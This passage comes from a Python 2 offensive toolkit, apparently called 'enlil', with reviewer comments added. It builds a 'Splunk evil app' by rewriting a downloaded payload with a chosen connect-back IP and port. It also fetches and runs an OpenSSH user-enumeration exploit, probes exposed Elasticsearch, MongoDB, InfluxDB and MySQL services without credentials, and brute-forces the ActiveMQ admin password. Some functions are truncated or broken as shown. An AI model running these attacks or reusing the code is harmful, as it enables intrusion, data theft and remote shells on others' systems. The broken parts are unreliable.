    # Download (or reuse) a Splunk app tarball and rewrite its callback
    # host/port and app name with sed, entirely through shell=True commands.
    print OKGREEN
    print ' [+] Creating Splunk evil app (for Linux)' + ENDC
    print '' + BOLD + '\n'

    print ' Press 1 to download or 2 to use local app (tgz):'
    get_or_have = raw_input(' [1/2]: ')

    if get_or_have == '1':
        print ' [+] downloading the app...'
        # NOTE(review): the archive is fetched from a GitHub URL and used
        # without any integrity check (no hash or signature).
        default_app = 'https://github.com/c610/tmp/raw/master/apka2.tgz'
        getapp = 'wget ' + default_app + ' -O /tmp/apka2.tgz'
        subprocess.call([ getapp ], shell=True)
        print OKGREEN
        print ' [+] app should be ready in /tmp/apka2.tgz'
        print ' [+] preparing...' + ENDC

        # random (not secrets) is acceptable here: the name only has to
        # differ between runs, it is not a credential.
        random1 = ''.join([random.choice(string.ascii_letters + string.digits) for n in xrange(32)])
        appname = random1 # new appname cuz Splunk don't like the same :C

        lhost = raw_input(' connecback to[IP]> ')
        lport = raw_input(' connctback to[port] ')


        # NOTE(review): lhost and lport are spliced unvalidated into a
        # shell=True command string (inside sed expressions), and every
        # path is a fixed, predictable name under the shared /tmp.
        rewriteapp = "cd /tmp; tar zxvf /tmp/apka2.tgz;"
        rewriteapp += "cd /tmp/apka2/bin;sed -e 's/192.168.1.160/" + lhost + "/g' apka2.py > apkanew.py;"
        rewriteapp += "sed -e 's/4444/" + lport + "/g' apkanew.py > apkafinal.py;"
        rewriteapp += "cd /tmp/apka2/default/;sed -e 's/\[apka2/\[" + appname + "/g' commands.conf > commands.new;"
        rewriteapp += "rm /tmp/apka2/default/commands.conf; mv /tmp/apka2/default/commands.new /tmp/apka2/default/commands.conf;"
        rewriteapp += "rm /tmp/apka2/bin/apka2.py /tmp/apka2/bin/apkanew.py; cd /tmp; tar cf /tmp/apkash.tgz ./apka2/;"
        rewriteapp += "ls -la /tmp/apkash.tgz"

        subprocess.call([rewriteapp], shell=True)
        print OKGREEN + ' [+] Splunk app rewrited: /tmp/apkash.tgz\n' + ENDC
        print appname


    elif get_or_have == '2':
        # NOTE(review): this branch only prints; nothing is actually done
        # with a local archive in this version.
        print ' [+] using local app:'

    else:
        print FAIL + ' [-] Maybe later ;[\n' + ENDC


    print OKGREEN + ' [+] Creating Splunk evil app - finished.\n' + ENDC
181 |
182 |
183 |
184 | ### ---
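def receive_port():
    """Connect to host:port, print the first 1024 bytes received, send 'quit'.

    Differences from the original: the socket is always closed (it leaked
    when recv()/send() failed after connect), a non-numeric port is
    reported instead of raising ValueError out of the menu, and a 10 s
    timeout keeps a silent peer from blocking the session forever
    (socket.timeout is a socket.error, so it lands in the same handler).
    """
    print('' + BOLD + '\n')

    target = raw_input(' set target: ')
    port = raw_input(' set port: ')

    try:
        port_num = int(port)
    except ValueError:
        print(FAIL + ' [-] port must be a number ;Z\n' + ENDC)
        return

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(10)
    try:
        s.connect((target, port_num))

        print('\n [+] received:')
        print(s.recv(1024))
        print(' -- -- --\n')

        #s.send('GET /' + buffer + ' HTTP/1.0\r\n\r\n')
        #print s.recv(1024)
        s.send('quit\r\n')
    except socket.error:
        print(FAIL + ' [-] Connection error ;Z\n' + ENDC)
    finally:
        s.close()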
209 |
210 |
211 |
--------------------------------------------------------------------------------
/enlil-v0.2/files/path01.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # path01: openssh enum bug
3 |
4 | # --- imports ---
5 | import subprocess
6 |
7 |
8 | # --- super colours ---
# ANSI SGR escape sequences for coloured terminal output. ENDC resets the
# attributes; the print calls in this module pair a colour with ENDC.
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
17 |
18 |
19 |
def enum():
    # Wrapper around the public EDB-45233 PoC (CVE-2018-15473): fetch or
    # locate the script, run it against one target with a user list, then
    # print the result file.
    print OKGREEN + ' [+] path 1: openssh enum bug' + ENDC
    print ''

    print OKGREEN + ' [+] preparing...\n' + ENDC + BOLD

    grab_or_not = raw_input(' using tool [local/wget]: ')
    print '\n' + ENDC

    pocpath = '/tmp/45233.py' # for 'default'

    if grab_or_not == 'wget':
        # grab poc from EDB:45233; CVE-2018-15473
        # NOTE(review): --no-check-certificate disables TLS verification on
        # the download, and the fetched script is executed below without any
        # integrity check — a supply-chain risk for whoever runs this tool.
        getpoc = 'wget --no-check-certificate https://www.exploit-db.com/download/45233 -O ' + pocpath
        subprocess.call([ getpoc ],shell=True)
        print '' + OKGREEN
        print ' poc should be ready to configure...' + ENDC

    elif grab_or_not == 'local':
        print ' [1] /tmp/45233.py ("default")'
        # NOTE(review): the listing is cut here — gutter lines 41-48 are
        # missing and the next line is a fragment of a prompt, so this
        # branch does not parse as shown.
        print ' [2] > ')
    print ENDC

    print BOLD
    target = raw_input(' set target: ')
    port = raw_input(' set port: ')
    threads = 2  # NOTE(review): unused; the command below hardcodes --threads 2
    outputFile = 'ssh-enum-bug-'+target+'.log'
    userlist = raw_input(' (full path to) userlist[/tmp/users.txt]: ')
    print ENDC

    # NOTE(review): port, userlist and target are spliced unvalidated into
    # a shell=True command string.
    runEnumPoc = 'python ' + pocpath + ' --port ' + port
    runEnumPoc += ' --threads 2 --outputFile /tmp/' + outputFile
    runEnumPoc += ' --userList ' + userlist + ' ' + target
    subprocess.call([ runEnumPoc ], shell=True)

    print OKGREEN + '\n [+] poc finished, checking results:' + ENDC
    # The result file is whatever the PoC wrote; a missing file raises IOError here.
    enumusers = '/tmp/'+outputFile
    readusers = open(enumusers,'r')
    lines = readusers.read()
    print '\n' + lines
    readusers.close()

    print ' [+] logfile saved to %s\n' % ( enumusers )
    print '\n' + OKGREEN
    print ' [+] path 1: openssh enum - finished.\n' + ENDC
74 |
75 |
76 |
--------------------------------------------------------------------------------
/enlil-v0.2/files/path02.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # path02: testing kibana
3 | #
4 | # current:
5 | # - getversion
6 | #
7 |
8 | # --- imports ---
9 | import subprocess
10 | import re
11 | import requests
12 |
13 | # --- super colours ---
# ANSI SGR escape sequences used for the interactive output.  They are printed
# unconditionally (no isatty() check), so redirected output keeps the raw
# escape bytes.
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
22 |
23 |
24 |
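def getversion():
    """Path 2: fingerprint a Kibana instance at http://<target>:5601/app/kibana.

    Pulls the version string out of the page's kbn-injected-metadata
    attribute.  Network failures are reported on a FAIL line and the request
    has a timeout; the original let requests raise straight out of the menu
    and a filtered port hung the tool for good.
    """
    print OKGREEN + ' [+] path 2: kibana webapp' + ENDC
    print ''

    # GET to IP:5601 to grab version
    print BOLD
    target = raw_input(' set target: ')
    print ' port: 5601'
    fullUrl = 'http://' + target + ':5601/app/kibana'
    print ' full url: ' + fullUrl

    print ENDC
    print ' [+] checking version...'
    try:
        req = requests.get(fullUrl, timeout=15)
    except requests.exceptions.RequestException as e:
        print FAIL + ' [-] Could not reach %s: %s' % (fullUrl, e) + ENDC
        print ''
        return
    resp = req.text

    # NOTE(review): the value is JSON inside an HTML attribute; if the server
    # HTML-escapes the quotes (&quot;) this literal pattern never matches --
    # look at the raw page if the FAIL line below keeps showing up.
    findver = re.compile('kbn-injected-metadata data="{"version":"(.*?)",')
    foundver = findver.search(resp)

    if foundver:
        print OKGREEN
        print ' [+] Kibana version: %s' % (foundver.group(1))
        print ENDC
    else:
        print FAIL + ' [-] Could not determine Kibana version, sorry :<' + ENDC
        print ''

    print '' + BOLD
    print ' [+] path 02: kibana webappp - finished.' + ENDC
    print ''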
57 |
58 |
59 |
--------------------------------------------------------------------------------
/enlil-v0.2/files/path03.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # path03: elasticsearch
3 | #
4 | # current:
5 | # - getversion
6 | # - preauth_search
7 | #
8 |
9 | # --- imports ---
10 | import subprocess
11 | import requests
12 | import json
13 |
14 | # --- super colours ---
# ANSI SGR escape sequences used for the interactive output.  They are printed
# unconditionally (no isatty() check), so redirected output keeps the raw
# escape bytes.
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
23 |
24 |
25 |
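def getversion():
    """Path 3a: print what an Elasticsearch node on http://<target>:9200/ answers to GET /.

    The root document of a node that answers without credentials usually
    carries its version banner; it is printed verbatim.  Treat that body as
    untrusted -- it comes from the target and a hostile service can embed
    terminal escape sequences in it.  Connection errors are reported on a
    FAIL line and the request is bounded by a timeout (the original had
    neither, so a refused port crashed the menu and a filtered one hung it).
    """
    print OKGREEN + ' [+] path 3a: elasticsearch on 9200 - get version' + ENDC
    print

    print BOLD
    target = raw_input(' set target: ')
    print ' port: 9200' + ENDC

    fullUrl = 'http://' + target + ':9200/'
    headers = {'content-type': 'application/json'}

    print OKBLUE + ' [i] checking version...' + ENDC
    try:
        req = requests.get(fullUrl, headers=headers, timeout=15)
    except requests.exceptions.RequestException as e:
        print FAIL + ' [-] Could not reach %s: %s\n' % (fullUrl, e) + ENDC
        return

    print ' -- resp --\n'
    print req.text
    print ' -- end of resp --\n'

    print BOLD + ' [+] path 3a - elasticsearch on 9200 - get version - finished.\n' + ENDC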
46 |
47 | ##
48 |
49 |
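def preauth_search():
    """Path 3b: POST a match_all query to http://<target>:9200/_search without credentials.

    A hit listing documents means the cluster's HTTP API is readable by
    anyone who can reach 9200 -- the finding this path is after.  The reply
    (which may contain real data from the target's indices) is printed raw;
    treat it as untrusted.  Connection errors are reported on a FAIL line and
    the request has a timeout, instead of propagating or hanging as before.
    """
    print OKGREEN + ' [+] path 3b: elasticsearch on 9200 - preauth search' + ENDC
    print ''

    print BOLD
    target = raw_input(' set target: ')
    print ' port: 9200'
    print ENDC

    fullUrl = 'http://' + target + ':9200/_search'
    url_data = {"query": {"match_all": {}}}
    headers = {'content-type': 'application/json'}

    print OKBLUE + ' [i] sending search request...' + ENDC
    try:
        req = requests.post(fullUrl, data=json.dumps(url_data), headers=headers, timeout=15)
    except requests.exceptions.RequestException as e:
        print FAIL + ' [-] Could not reach %s: %s\n' % (fullUrl, e) + ENDC
        return

    print ' -- resp --\n'
    print req.text
    print ' -- end of resp --\n'

    print BOLD + ' [+] path 3b - elasticsearch on 9200 - preauth search - finished.\n' + ENDC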
72 |
73 | ##
74 |
75 |
76 |
--------------------------------------------------------------------------------
/enlil-v0.2/files/path04.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # path04: oracle tns listener
3 | #
4 | # current:
5 | # -- tnscmd10g using: ping, status, version
6 | #
7 |
8 | # --- imports ---
9 | import subprocess
10 | import re
11 |
12 | # --- super colours ---
# ANSI SGR escape sequences used for the interactive output.  They are printed
# unconditionally (no isatty() check), so redirected output keeps the raw
# escape bytes.
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
21 |
22 |
23 |
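def tnscmds():
    """Path 4: poke an Oracle TNS listener with tnscmd10g ping / version / status.

    The three invocations differ only in the verb, so one private helper
    runs them.  Arguments go to subprocess as an argv list (shell=False):
    the target and port typed by the operator are then never interpreted by
    a shell, and a missing tnscmd10g binary surfaces as a clear FAIL line
    instead of a 'command not found' from /bin/sh (which the original
    could not detect, because the shell swallowed it).
    """
    print OKGREEN + ' [+] path 4: oracle tns listener unauthorized' + ENDC
    print '' + BOLD

    target = raw_input(' set target: ')
    port = raw_input(' set port: ')
    print ENDC

    for verb in ('ping', 'version', 'status'):
        print OKGREEN
        print '\n [+] checking: %s\n' % (verb) + ENDC
        if not _run_tnscmd(verb, target, port):
            break  # binary missing: the remaining verbs would fail the same way
        print '\n'

    print OKGREEN
    print ' [+] path 4: oracle tns listener - finished.\n' + ENDC


def _run_tnscmd(verb, target, port):
    """Run `tnscmd10g <verb> -h <target> -p <port>`; return False if it cannot be started."""
    try:
        subprocess.call(['tnscmd10g', verb, '-h', target, '-p', port])
    except OSError as e:
        print FAIL + ' [-] cannot run tnscmd10g (%s) - is it installed?\n' % (e) + ENDC
        return False
    return True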
52 |
53 | ##
54 |
55 |
--------------------------------------------------------------------------------
/enlil-v0.2/files/path05.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # path05: testing splunk
3 | #
4 | # current:
5 | # - getversion
6 | #
7 |
8 | # --- imports ---
9 | import subprocess
10 | import re
11 | import requests
12 | import sys
13 | import urllib3
14 | urllib3.disable_warnings()
15 |
16 | # --- super colours ---
# ANSI SGR escape sequences used for the interactive output.  They are printed
# unconditionally (no isatty() check), so redirected output keeps the raw
# escape bytes.
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
25 |
26 |
27 |
def getversion():
    """Path 5a: try to read the Splunk Web version from http://<target>:<port>/en-US/.

    NOTE(review): the pattern in `find = re.compile('')` is empty in this
    listing -- it looks like the original regex was HTML-shaped and got
    stripped on extraction (getrest() below lost spans the same way).  As
    written the empty pattern matches at offset 0 of any body, so `found` is
    always truthy and `found.group(1)` raises IndexError (there is no group
    1).  Restore the pattern from the upstream file before using this path.
    Also: requests.get() has no timeout and no error handling, so a filtered
    port hangs the menu and a refused one raises out of it.
    """
    print OKGREEN + ' [+] path 5a: Splunk webapp (default:8000/tcp)' + ENDC
    print ''

    # prompts (the "IP:5601" comment in the original is a stale copy from the Kibana path)
    print BOLD
    target = raw_input(' set target: ')
    port = raw_input(' set port: ')
    print ENDC

    print OKBLUE
    print ' [+] Trying to identify version...' + ENDC

    fullUrl = 'http://' + target + ':' + port + '/en-US/'
    req = requests.get(fullUrl)
    resp = req.text

    # NOTE(review): pattern lost on extraction -- see docstring
    find = re.compile('')
    found = re.search(find, resp)

    if found:
        print OKGREEN
        print ' [+] Found version: ' + found.group(1) + '\n' + ENDC

    #
    print '' + BOLD
    print ' [+] path 05a: Splunk webappp - finished.\n' + ENDC
    print ''
56 |
57 | ##
58 |
59 |
def getrest():
    """Path 5b: probe the Splunk management REST API (default 8089/tcp).

    NOTE(review): this function is damaged in the listing and is NOT runnable
    as shown.  Two regexes lost their HTML-looking content on extraction:
    `re.findall("(.*?)", ...)` was probably `<title>(.*?)</title>` (its
    matches are called "title"), and the `find_links` line has its pattern
    plus the loop that printed each `link` (original lines 94-99) collapsed
    into `find_links = re.findall(' %s' % ( link )`, a syntax error.  Restore
    both from the upstream file before running.

    What the surviving code does: POSTs a JSON event to https://<target>:8089/
    with an `Authorization: Splunk <token>` header whose token is the dummy
    from the linked StackOverflow answer (not a real credential), scrapes
    title-like strings from the reply, then GETs https://<target>:<port>/<title>
    for each one and scrapes links out of that.  verify=False on every
    request: the appliance's TLS certificate is never checked (and the
    warnings for that are silenced at import time above).
    """
    print OKGREEN + ' [+] path 5b: Splunk REST API (default: 8089/tcp)' + ENDC
    print ''

    # prompts (the "IP:5601" comment in the original is a stale copy from the Kibana path)
    print BOLD
    target = raw_input(' set target: ')
    port = raw_input(' set port: ')
    print ENDC

    print OKBLUE
    print ' [+] Trying to identify version...' + ENDC

    # grabbed from:
    # https://stackoverflow.com/questions/47716695/write-log-entry-to-splunk-via-http-in-python/47756716#47756716
    # NOTE: this URL hard-codes 8089 and ignores the `port` just asked for;
    # `port` is only used for the per-title GETs further down.
    url='https://' + target + ':8089/'
    # placeholder token copied from the StackOverflow answer -- not a real credential
    authHeader = {'Authorization': 'Splunk {}'.format('ABCDEFG-8A55-4ABB-HIJK-1A7E6637LMNO')}
    jsonDict = {"index":"cloud_custodian", "event": { 'message' : "Sample pentest message" } }

    # verify=False: the target's TLS certificate is not validated
    r = requests.post(url, headers=authHeader, json=jsonDict, verify=False)
    resp = r.text

    # NOTE(review): pattern lost on extraction (see docstring).  As written,
    # "(.*?)" yields only empty strings, so every `title` below is ''.
    find_title = re.findall("(.*?)", resp, re.MULTILINE)
    #find_ids = re.findall("(.*?)", resp, re.MULTILINE)

    for title in find_title:
        print OKGREEN
        print ' Found title: %s' % ( title )
        print ENDC + BOLD
        # req2: GET found services
        try:
            getservice = 'https://' + target + ':' + port+ '/' + title
            req2 = requests.get(getservice, headers=authHeader, verify=False)
            resp2 = req2.text
            # NOTE(review): pattern and the link-printing loop are collapsed
            # into this line; it is a syntax error until restored from upstream
            find_links = re.findall(' %s' % ( link )

            print ' --- end of service %s ---\n' % ( title )

        except requests.exceptions.ConnectionError as e:
            print ' [-] error when requesting %s:\n%s' % ( title, e )
            pass

    #
    print '' + BOLD
    print ' [+] path 05b: Splunk webappp - finished.\n' + ENDC
    print ''
116 |
117 | ##
118 |
119 |
--------------------------------------------------------------------------------
/enlil-v0.2/files/path06.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # path06: testing influxdb
3 | #
4 | # current:
5 | # - getDBs - list available (preauth) databases
6 | #
7 |
8 | # --- imports ---
9 | import subprocess
10 | import re
11 | import requests
12 |
13 | # --- super colours ---
# ANSI SGR escape sequences used for the interactive output.  They are printed
# unconditionally (no isatty() check), so redirected output keeps the raw
# escape bytes.
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
22 |
23 |
24 |
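def getDBs():
    """Path 6: list InfluxDB databases through the unauthenticated /query endpoint.

    Sends `SHOW DATABASES` to http://<target>:8086/query.  A reply that lists
    databases means the HTTP API accepts queries without credentials.  The
    body is printed raw (it is data from the target -- do not trust it).
    Connection errors are reported on a FAIL line and the request has a
    timeout; the original propagated the exception and could hang on a
    filtered port.  The progress line used to say "checking version", which
    this path never did.
    """
    print OKGREEN + ' [+] path 6: influxdb - get DB\'s' + ENDC
    print ''

    print BOLD
    target = raw_input(' set target: ')
    print ' port: 8086'
    fullUrl = 'http://' + target + ':8086/query?q=SHOW+DATABASES&db=_internal'
    print ENDC

    print ' [+] listing databases...'
    try:
        req = requests.get(fullUrl, timeout=15)
    except requests.exceptions.RequestException as e:
        print FAIL + ' [-] Could not reach %s: %s\n' % (fullUrl, e) + ENDC
        return

    print BOLD
    print ' --- resp ---' + ENDC
    print req.text
    print BOLD + '\n --- end of resp --- \n' + ENDC

    print '' + BOLD
    print ' [+] path 06: influxdb - get DB\'s - finished.' + ENDC
    print ''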
50 |
51 |
--------------------------------------------------------------------------------
/enlil-v0.2/files/path07.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # path07: testing mongodb
3 | #
4 | # note: to use this path you'll need to:
5 | # # apt-get install python-pymongo -y
6 | #
7 | # current:
8 | # - preauthlist
9 | # - postauthlist
10 |
11 | # --- imports ---
12 | import pymongo
13 | from pymongo import MongoClient
14 | import subprocess
15 | import re
16 |
17 | # --- super colours ---
# ANSI SGR escape sequences used for the interactive output.  They are printed
# unconditionally (no isatty() check), so redirected output keeps the raw
# escape bytes.
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
26 |
27 |
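def preauthlist():
    """Path 7a: list MongoDB databases without credentials.

    Opens an anonymous MongoClient to <target>:<port> and calls
    list_database_names(); a listing means the instance is readable without
    authentication.  An empty port answer falls back to 27017, as the prompt
    advertises (the original passed '' to int() and crashed), and a
    non-numeric port is reported instead of raising.  MongoClient connects
    lazily, so "We are connected!" is only printed once the listing round
    trip has actually succeeded.
    """
    print OKGREEN + ' [+] path 7a: mongodb - preauth list DB\'s' + ENDC

    print BOLD
    target = raw_input(' set target: ')
    port = raw_input(' set port[27017]: ')
    print ENDC

    try:
        port_no = int(port) if port else 27017
    except ValueError:
        print FAIL + ' [-] port must be a number, got %r\n' % (port) + ENDC
        return

    try:
        client = MongoClient(target, port_no)
        # first real round-trip: auth and timeout errors surface here
        dbs = client.list_database_names()
        print OKGREEN + '\n [+] We are connected! :)\n' + ENDC
        print BOLD + ' [+] Listing available databases:' + ENDC
        for db in dbs:
            print ' -db-> %s' % (db)

    except pymongo.errors.OperationFailure:
        print FAIL + ' [-] We need some credentials to access DB ;[\n' + ENDC

    except pymongo.errors.ServerSelectionTimeoutError:
        print FAIL + ' [-] We can not connect to remote DB (timeout) :Z\n' + ENDC

    print '' + BOLD
    print ' [+] path 7a: mongodb - preauth list - finished.' + ENDC
    print ''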
54 |
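def postauthlist():
    """Path 7b: authenticate to MongoDB with a username/password and list databases.

    The credentials are passed to MongoClient as username=/password= keyword
    arguments instead of being spliced into a mongodb:// URI: a password
    containing '@', ':', '/' or '%' would otherwise be mis-parsed as part of
    the host or rejected as an invalid URI.  Those kwargs exist since pymongo
    3.5, and list_database_names() already requires 3.6.  An empty port
    answer falls back to 27017, as the prompt advertises; a non-numeric port
    or an empty username is reported instead of raising.
    """
    print OKGREEN + ' [+] path 7b: mongodb - postauth list DB\'s' + ENDC

    print BOLD
    target = raw_input(' set target: ')
    port = raw_input(' set port[27017]: ')
    user = raw_input(' try username: ')
    passwd = raw_input(' try password: ')
    print ENDC

    try:
        port_no = int(port) if port else 27017
    except ValueError:
        print FAIL + ' [-] port must be a number, got %r\n' % (port) + ENDC
        return
    if not user:
        print FAIL + ' [-] a username is required for the postauth check (use 7a for anonymous)\n' + ENDC
        return

    try:
        client = MongoClient(target, port_no, username=user, password=passwd)
        # connection is lazy: the first round-trip (and any auth failure) happens here
        dbs = client.list_database_names()
        print OKGREEN + '\n [+] We are connected! :)\n' + ENDC
        print BOLD + ' [+] Listing available databases:' + ENDC
        for db in dbs:
            print ' -db-> %s' % (db)

    except pymongo.errors.OperationFailure:
        print FAIL + ' [-] Wrong credentials :C\n' + ENDC

    except pymongo.errors.ServerSelectionTimeoutError:
        print FAIL + ' [-] We can not connect to remote DB (timeout) :Z\n' + ENDC

    except pymongo.errors.ConfigurationError as e:
        # invalid combination of connection parameters
        print FAIL + ' [-] bad connection parameters: %s\n' % (e) + ENDC

    print '' + BOLD
    print ' [+] path 7b: mongodb - postauth list - finished.' + ENDC
    print ''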
86 |
87 |
88 |
89 |
--------------------------------------------------------------------------------
/enlil-v0.2/files/path08.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # path08: testing pcp
3 | #
4 | # current:
5 | # - getstats
6 | #
7 |
8 | # --- imports ---
9 | import subprocess
10 | import re
11 |
12 | # --- super colours ---
# ANSI SGR escape sequences used for the interactive output.  They are printed
# unconditionally (no isatty() check), so redirected output keeps the raw
# escape bytes.
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
21 |
22 |
23 |
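def getstats():
    """Path 8: query a remote Performance Co-Pilot collector with `pcp uptime`.

    Runs `pcp -h <target> -p <port> uptime`.  The command is started from an
    argv list, so the operator-typed target/port never reach a shell, and a
    missing pcp binary now raises OSError -- which is what the except branch
    was always meant to catch: with shell=True, /bin/sh printed 'command not
    found', returned 127 and the bare `except:` never fired for that case.
    The banner is printed before the work instead of after it, like the
    other paths do.
    """
    print OKGREEN + ' [+] path 8: testing pcp' + ENDC
    print ''

    print BOLD
    target = raw_input(' set target: ')
    port = raw_input(' set port: ')
    print ENDC

    # Other pcp sub-commands that could be wired up the same way:
    # atop atopsar collectl dmcache dstat free iostat ipcs lvmcache mpstat
    # numastat pidstat python shping summary tapestat uptime verify vmstat
    cmd = 'uptime'
    try:
        print '\n --- response ---\n'
        subprocess.call(['pcp', '-h', target, '-p', port, cmd])
        print '\n --- response ---\n'
    except OSError:
        print FAIL + ' [-] Can not find pcp - install it!\n' + ENDC

    print '' + BOLD
    print ' [+] path 08: testing pcp - finished.' + ENDC
    print ''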
51 |
52 |
--------------------------------------------------------------------------------
/enlil-v0.2/files/path09.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # path09: finding mysql
3 | #
4 | # current:
5 | # - ...
6 | #
7 |
8 | # --- imports ---
9 | import subprocess
10 | import re
11 | import MySQLdb
12 |
13 | # --- super colours ---
# ANSI SGR escape sequences used for the interactive output.  They are printed
# unconditionally (no isatty() check), so redirected output keeps the raw
# escape bytes.
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
22 |
23 |
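def getdbs():
    """Path 9: try the `mysql` account with an empty password and list databases.

    Fixes over the original: the port the operator types is now actually
    passed to MySQLdb.connect (it was read and then ignored, so every run
    went to the library default), an empty port answer falls back to 3306,
    a non-numeric port is reported instead of raising, the connect has a
    timeout, and the connection is closed in a `finally` so a failing query
    does not leak it.  Credentials under test are fixed: user 'mysql',
    blank password.
    """
    print OKGREEN + ' [+] path 9: testing mysql' + ENDC
    print ''

    print BOLD
    target = raw_input(' set target: ')
    port = raw_input(' set port: ')
    print ENDC

    try:
        port_no = int(port) if port else 3306
    except ValueError:
        print FAIL + '\n [-] port must be a number, got %r\n' % (port) + ENDC
        return

    conn = None
    try:
        # connecting people
        conn = MySQLdb.connect(host=target,
                               port=port_no,
                               user='mysql',
                               passwd='',
                               db='',
                               connect_timeout=10)

        # one cursor for all execs/queries
        cur = conn.cursor()
        cur.execute("show databases")
        for row in cur.fetchall():
            print row[0]

    except MySQLdb.OperationalError:
        print FAIL + '\n [-] Can not connect, sorry :Z\n' + ENDC

    finally:
        if conn is not None:
            conn.close()

    print '' + BOLD
    print ' [+] path 9: testing mysql - finished.' + ENDC
    print ''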
58 |
59 |
60 |
--------------------------------------------------------------------------------
/enlil-v0.2/files/path10.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # path10: testing Prometheus (9090/tcp)
3 | #
4 | # current:
5 | # - (preauth) getinfo
6 | #
7 |
8 | # --- imports ---
9 | import subprocess
10 | import re
11 | import requests
12 | import sys
13 | import urllib3
14 | urllib3.disable_warnings()
15 |
16 | # --- super colours ---
# ANSI SGR escape sequences used for the interactive output.  They are printed
# unconditionally (no isatty() check), so redirected output keeps the raw
# escape bytes.
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
25 |
26 |
27 |
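def getinfo():
    """Path 10: Prometheus (default 9090/tcp) pre-auth info -- NOT IMPLEMENTED YET.

    Only prompts for target and port and prints the banners; no request is
    made (the "STILL IN PROGRESS" marker is where the check belongs).
    """
    # banner typo fixed ("pretuah" -> "preauth") so it matches the closing line
    print OKGREEN + ' [+] path 10: Prometheus - preauth - get_info' + ENDC
    print ''

    print BOLD
    target = raw_input(' set target: ')
    port = raw_input(' set port: ')  # default 9090/tcp
    print ENDC

    print OKBLUE
    print ' [+] Trying to identify version...' + ENDC

    # ... STILL IN PROGRESS... ;Z ...  (target/port are collected but unused so far)

    print '' + BOLD
    print ' [+] path 10: Prometheus - preauth - get_info - finished.\n' + ENDC
    print ''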
47 |
48 | ##
49 |
50 |
51 |
52 |
--------------------------------------------------------------------------------
/enlil-v0.2/files/path11.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # path11: testing activemq - admin panel
3 | #
4 | # based on:
5 | # https://raw.githubusercontent.com/c610/tmp/master/actlikeMQ.py
6 | #
7 | # current:
8 | # - bf
9 | # - sender
10 |
11 | # --- imports ---
12 | import subprocess
13 | import re
14 | import sys
15 | import requests
16 | from requests.auth import HTTPBasicAuth
17 | from stomp import * # for STOMP protocol
18 | import stomp
19 |
20 | # --- super colours ---
# ANSI SGR escape sequences used for the interactive output.  They are printed
# unconditionally (no isatty() check), so redirected output keeps the raw
# escape bytes.
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
29 |
30 |
31 |
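def bfadmin():
    """Path 13a: dictionary attack on the ActiveMQ web console (user `admin`).

    Every word of /usr/share/wordlists/dirb/common.txt is tried as the admin
    password over HTTP basic auth against http://<target>:<port>/admin/; a
    hit is recognised by 'ActiveMQ Console' in the response body.

    Changes over the original: the matching password is printed (it used to
    be discarded), the function returns instead of sys.exit()-ing the whole
    menu, a missing wordlist and network errors are reported, an exhausted
    wordlist says so, and every request carries a timeout so a stalling
    host cannot hang the loop.  This sends thousands of failed logins --
    noisy and easily rate-limited; only run it where that is in scope.
    """
    print OKGREEN + ' [+] path 13a: testing activemq - admin panel' + ENDC
    print ''

    print BOLD
    target = raw_input(' set target: ')
    port = raw_input(' set port: ')
    print ENDC

    remote_host = 'http://' + target + ':' + port + '/admin/'
    our_user = 'admin'
    pwd_file = '/usr/share/wordlists/dirb/common.txt'

    try:
        with open(pwd_file, 'r') as read_pwds:
            pwds = [line.rstrip() for line in read_pwds]
    except IOError as e:
        print FAIL + ' [-] cannot read wordlist %s: %s\n' % (pwd_file, e) + ENDC
        return

    sess = requests.session()
    try:
        for pwd in pwds:
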